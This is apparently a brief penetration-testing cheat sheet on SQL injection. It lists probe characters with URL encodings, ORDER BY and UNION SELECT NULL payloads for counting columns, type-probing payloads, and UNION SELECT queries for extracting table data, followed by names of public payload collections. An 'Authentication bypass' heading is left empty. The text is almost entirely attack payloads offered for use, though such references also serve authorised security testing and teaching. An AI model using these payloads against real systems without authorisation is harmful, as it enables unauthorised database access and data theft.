SQL injection (SQLi)

Identifying SQLi

Payload    URL Encoded
'          %27
"          %22
#          %23
;          %3B
)          %29

Authentication bypass

Union-based SQLi

Determine the number of columns

ORDER BY 1-- -
ORDER BY 2-- -
ORDER BY 3-- -
UNION SELECT NULL-- -
UNION SELECT NULL,NULL-- -
UNION SELECT NULL,NULL,NULL-- -

Determine the data type of each column

UNION SELECT 'a',NULL,NULL-- -
UNION SELECT NULL,'a',NULL-- -
UNION SELECT NULL,NULL,'a'-- -

Retrieve information

UNION SELECT columna1, columna2, columna3 FROM tabla1-- -
UNION ALL SELECT columna1, columna2, columna3 FROM tabla1-- -

Payloads

FuzzDB

Payload Box

Payloads All The Things
